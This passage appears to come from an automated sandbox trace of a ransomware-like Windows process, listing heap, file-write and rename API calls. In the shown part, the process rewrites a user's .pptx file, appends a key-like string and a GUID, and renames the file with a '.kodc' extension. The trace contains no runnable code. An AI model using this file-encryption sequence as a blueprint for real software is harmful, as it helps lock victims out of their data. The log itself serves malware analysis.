lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.948] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.948] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.948] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x12460) returned 0x9ba4d90 [0098.948] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.948] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d8d0 [0098.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac58 [0098.948] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d918 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac70 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aca0 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acb8 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.949] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aca0 | out: hHeap=0x630000) returned 1 [0098.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acb8 | out: hHeap=0x630000) returned 1 [0098.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.949] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331acb8 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aca0 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0098.949] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acb8 | out: hHeap=0x630000) returned 1 [0098.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aca0 | out: hHeap=0x630000) returned 1 [0098.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.950] GetCurrentThreadId () returned 0x42c [0098.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8fce8 [0098.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.950] GetCurrentThreadId () returned 0x42c [0098.950] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.950] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aca0 [0098.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acb8 [0098.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ac88 [0098.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331acd0 [0098.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0098.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aca0 | out: hHeap=0x630000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aca0 [0098.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aca0 | out: hHeap=0x630000) returned 1 [0098.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acd0 | out: hHeap=0x630000) returned 1 [0098.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331acb8 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac88 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ac70 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d918 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.954] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x1245f, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x1245f, lpOverlapped=0x0) returned 1 [0098.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.955] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12464, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.955] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.955] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.955] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.955] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.955] CloseHandle (hObject=0x5cc) returned 1 [0098.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e268 [0098.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e268 | out: hHeap=0x630000) returned 1 [0098.957] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_SiYzjXVaSCNyN_APIVN.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_siyzjxvascnyn_apivn.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_SiYzjXVaSCNyN_APIVN.pptx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_siyzjxvascnyn_apivn.pptx.kodc")) returned 1 [0098.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.958] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.959] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15f4a1d0, ftCreationTime.dwHighDateTime=0x1d5bcf9, ftLastAccessTime.dwLowDateTime=0x35a1de20, ftLastAccessTime.dwHighDateTime=0x1d5c2fe, ftLastWriteTime.dwLowDateTime=0x35a1de20, ftLastWriteTime.dwHighDateTime=0x1d5c2fe, nFileSizeHigh=0x0, nFileSizeLow=0x12464, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_SiYzjXVaSCNyN_APIVN.pptx", cAlternateFileName="_SIYZJ~1.PPT")) returned 0 [0098.959] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0098.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0098.959] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0098.960] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0098.960] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0098.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0098.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0098.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0098.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0098.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.960] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.960] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.961] 